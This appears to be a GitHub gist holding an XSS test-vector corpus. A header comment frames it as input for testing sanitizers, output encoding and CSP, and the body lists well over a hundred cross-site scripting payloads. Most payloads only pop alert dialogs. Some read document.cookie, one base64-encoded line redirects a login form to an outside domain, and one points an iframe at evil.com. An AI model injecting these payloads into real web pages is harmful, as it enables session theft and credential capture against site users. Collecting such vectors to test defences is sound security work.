@OlivierLaflamme
Created November 4, 2025 21:25
l
<!--
  XSS test-vector corpus for checking output encoding, HTML sanitizers and
  input filters.

  Layout: the body holds one <something:script> element (prefix bound to the
  XHTML namespace) that opens on the first payload line and is closed at the
  end of the last one. Everything between is one test string per line, except
  the iframe whose src value is split one character per line.

  Reading notes for whoever maintains or consumes this list:
  * Most strings use alert / prompt / confirm as a harmless execution marker.
    The eval(atob(...)) line is different: its base64 decodes to a statement
    that reassigns the action of the element with id "yourlogin", so treat
    that line as a form-hijack sample, not a dialog probe.
  * Several lines name third-party hosts (iframe, img and script sources,
    link targets). Rendering this file in a browser will attempt those
    requests; feed lines to the component under test as input strings
    instead, or render with networking disabled.
  * The list mixes raw markup, HTML-entity-encoded forms (&quot;&gt;&lt;...)
    and percent-encoded forms (%27, %3d, %2f). Each only means something in
    the matching injection context (element body, attribute value, URL, JS
    string), so a filter test should record which context a line was
    injected into.
  * Trailing "(IE)" / "(chrome)" / "works in Chrome" text is the author's
    engine annotation, and the "becomes </script-disabled>..." line appears
    to record a filter's rewritten output; none of these are payload text.
  * NOTE(review): several entries are duplicated or truncated (missing a
    leading "<" or "&"); confirm whether that is intentional before
    de-duplicating.

  Expected result for a correctly defended sink: every line is rendered as
  inert text. Contextual output encoding, plus a Content-Security-Policy that
  disallows inline script and javascript: URLs, are the controls to verify
  against this list.
-->
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">javascript:prompt(1)
iframe src='javascript:prompt(document.domain);'>//
&quot;&gt;&lt;svg/onload=alert(1)&gt;
<svg/onload=javascript:void(0)?void(0):void(0)?:void(0)?void(0):void(0)?void(0):confirm
svg onload="prompt(/xss/)"></svg>
q"><img src=x onmouseover=prompt(1);>.jpg
"><img src=x onmouseover=alert(1)"></img>
x"></script><img src=x onerror=alert(1)>
<div style="background-image:url(javascript:alert('XSS'))">
<table background="javascript:alert('XSS')">
"><iframe src='javascript:prompt(document.domain);'>
"><iframe/src=javascript:alert(document.cookie)>
<iframe src="http://google.com"></iframe>
&quot;&gt;&lt;img src=x onerror=alert(1)>
"><b onmouseover=alert('wufff!')>Hussain Adnan ... Hack ! </b>
"><script>alert(String.fromCharCode(88, 83, 83));</script>
<a onmouseover="alert(1)" href="http://dhiqaroffice.com/test-pentest/testhtmlxss.html">read this!</a>
<IMG SRC="javascript:alert('XSS');">
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Air'/></3></>"><img src=1.gif onerror=alert(document.cookie)>tel
<a onmouseover="alert(1)">XXS link</a>
<img src="<img src=search"/onerror=alert('Hi')/">
<a href="blah onclick=alert(8007) ignoreme="blah">Click Me</a>
<A HREF=?xss onClick=alert(&#39Xss&#39)>blah</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
onmouseover=alert('XSS')
"onmouseover=alert(1)"
"onmouseover=alert(1)"
<img src="x" alt="``onerror=alert(1)">
"><svg/onload=prompt(2)>"<input onfocus="alert(1337)"autofocus>
">alert(1) #"> t" onmouseover=alert(1); a=" "onmouseover=prompt(1)>
“><img src=x onerror=confirm(1);>
&quot;&gt;&lt;img src=x onerror=prompt(1);&gt;
"><a onmouseover=alert(1)>a.jpg
alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//; alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//-- ></SCRIPT><script>alert(document.domain)</script><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
quot;&gt;&lt;svg/onload=window.onerror=alert;throw/XSS/;//
&quot;&gt;&lt;img src=x onerror=prompt(1)&gt;
&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;
&quot;&gt;&lt;svg/onload=prompt(0)&gt;
&quot;&gt;&lt;script/src=data:,alert(1)%2b"
&quot;&gt;&lt;script/src=data:,alert(1)%26sol;%26sol;
javascript:alert%281%29;
"><img src="http://i.imgur.com/08ntkha.jpg" onerror=prompt(document.cookie)>
"><svg/onload=confirm("XSS")>;
<iframe onload="alert('XSSED BY Hussain');"></iframe>http://<iframe onload="alert('XSSED BY Hussain Adnan');"></iframe>
<img src="a" onerror='eval(atob("ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInlvdXJsb2dpbiIpLmFjdGlvbj0idGhlZG9tYWluLm5ldCI7"))'
brute<body/onpageshow=(prompt)(/XSSPOSED/)>logic
onmouseover=alert('XSS')
" onmouseover=alert(1) "
<svg><x><script>alert&#40;7&#41</x>
<svg/brute><x><script/logic>al&#101rt&#40;7&#41</x>
<script> alert("XSSPOSED")<\script>>\
--><svg/onload=alert(/XSSPOSED/)//
<\i\m\g \s\r\c=x \o\n\e\r\r\o\r=\a\l\e\r\t(\'X\S\S\')\>'
"><img src=”data:;base64,YWxlcnQoOSk” onerror=prompt(1);>
<script/xx>/**/alert(/XSSPOSED/)//
"><script>alert(String.f romCharCode(88, 83, 83, 80, 79, 83, 69, 68))</script>
<iframe src="j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
1
)"></iframe>
'%3d'>"><iframe src="https://atmail.com" onmouseover=alert(document.domain)></iframe>/927
<img src=# onerror=alert(document.cookie)>
-><a id="a"href=javascript&colon;alert&lpar;1&rpar; id="a">Click</a>
<a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a>
http://example.com%20onmouseover=alert(1)%20style=font-size:100pt%20
<img src="<img onmouseover=alert(document.domain) src=x>"></img>
<script <a href="">atob</a>/,alert(document.domain)</script </td>
<img<img onmouseover=alert(1) src=x >></img>
<img src="<img onmouseover=alert(1) src=x>"></img>
<script>alert(1)</script>
<a onmouseover=alert(1)>click
"><IMG """><SCRIPT>alert("XSS")<CRIPT>">/S
<img alt="<img onerror=alert(document.domain)//"<">
<img src= onmouseover=javascript:alert(String.fromCharCode(83,116,111,114,101,100,32,88,83,83,32,105,110,32,77,105,99,114,111,115,111,102,116))>
<i onmouseover=alert(1)> <i></i>
<div style="width: expression(alert(/XSS_Jams/));"></div>
\<input type=</script><svg><script>/<@/>alert(1337)</script>
"”text”" value="”Your_name”"><input type="submit" value="Submit request" />
1"--><svg/onload=';alert(0);'>
"+confirm(1)+"#/
<script>confirm(document.domain);alert(1)</script>
<script>$='XSSPOSED',alert($)< /script>-jobs/
<IMG alt=``onerror=alert(1) src="x">
<img src="foo" alt="``onerror=alert(1)" />
<?XML:NAMESPACE PREFIX = [default] ><img src=x
onerror=alert(1) NS = "><img src=x onerror=alert(1)"
"><article xmlns="><img src=x onerror=alert(1)"></article>
'-confirm(1)-'
<image src=`` onerror=setTimeout/*("__")*/`\u0061lert\u00281\u0029/**/`>
<a href="data:\@['{§(`__`)$}']@\, % 3 c script % 3 e alert(1) % 3 c/script %3 e">FireFox</a>
<style onload='execScript(/**/"\x61lert&#40 1&#41","j\x61vascript");'> (IE)
<iframe onload="document.location.href=http://evil.com><svg/onload=alert(1)>&order=desc'">
</script><script>confirm(1)</script> becomes </script-disabled><script-disabled>confirm(1)</script-disabled>
</script%0A-_-><script>confirm(1)</script%0A-_->
<p style='\00\xss:\0a\0b\0c\09\65xpre\73sio\6e/**/(\61lert(1))'>hello world</p> (IE)
<input type="search" onsearch=prompt(1) autofocus> (chrome)
<details ontoggle=confirm(1)> (chrome)
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
[Click here](javascript:alert(1))
'-confirm(1)-'
<div</textarea><script>alert(123)</script>
<style=animation-name:x onanimationstart=alert(1)>
<img src=x onerror="alert(1)"
<img onerror=alert(document.domain) src <u></u>
"><script src=//3237054390/1>
<script xmlns="http://www.w3.org/xhtml">alert(0)</script>
<a style="-webkit-user-modify: read-only;" =href"javascript:alert(1)">CLICK
<marquee loop=1 width=0 onfinish=alert(1)>
<img src=a:alert(1) onerror=eval(src)>
<javas style=font-size:500px onmouseover=location=tagName%2binnerHTML%2bURL>cript:</javas>#%0Aalert(1)
<title><img src='</title><img src=s onerror=alert(1)>'></title>
“><script>alert(1);</script>”@sucuri.net
<iframe src="data:$te?QWERTY%(x)[0]{t}*/h123t456m789l0,<script>alert(document.domain)</script>">
<script/img>alert(/hussain/)</script/>
xxxxxxxx'yyyyy</img
<applet onerror=alert('xss')>
--><object/data=javascript:top[/ale/.source%2b/rt/.source]`@brutelogic`>
<script>x = '',__defineSetter__('x',alert),x=1,'';</script>
<div onactivate=alert('Xss') id=xss style=overflow:scroll>
<base href="javascript:\"> <a href="//%0aalert(/@irsdl/);//">works in Chrome</a>
\"; confirm(1); //
<img/src="x"/onerror="alert(document.domain)">@hotmail.com
<img/src="hat.png"/onerror="alert(1)">
<video/src/onratechange=alert(1)>
<body/onpageshow=alert(1)>
<frameset/onpageshow=alert(1)>
<input type=search onsearch="location='data:text/html;\x62\x61\x73\x65\x36\x34,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='">
<div onfocus="alert(1)" contenteditable tabindex="0" id="xss"></div>
<div onbeforescriptexecute="alert(1)"></div><script>1</script>
<div onactivate="alert(1)" id="xss" style="overflow:scroll"></div>
<style>@keyframes x{}</style> <div style="animation-name:x" onanimationstart="alert(1)"></div>
<style> div {width: 100px;} div:target {width: 200px;} </style> <div id="xss" onwebkittransitionend="alert(1)" style="-webkit-transition: width .1s;"></div>
<input value=<><iframe/src=javascript:confirm(1)
<svg%2fonload=alert(1)>
"><img src=a onerror=confirm(/2/)></textarea><ScRiPt>prompt(/920065/)</ScRiPt>'-confirm(1)-'<iframe/onload=alert(1)>
<script>alert(1);//
<mArquee%20onStart%3D[~[onmouseleave(([[(alert(1))]]))]]%20]
<svg><script /* /*/*/*>\u0061l\u0065rt`X`</x+x
<img border=3 alt=jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert(00039) )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert(322)gt;\x3e>
<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
%27-alert(document.domain)-%27
eval(Symbol(')-alert(1').toString())
%27</script><script>alert(0)</script></something:script>
</body>
</html>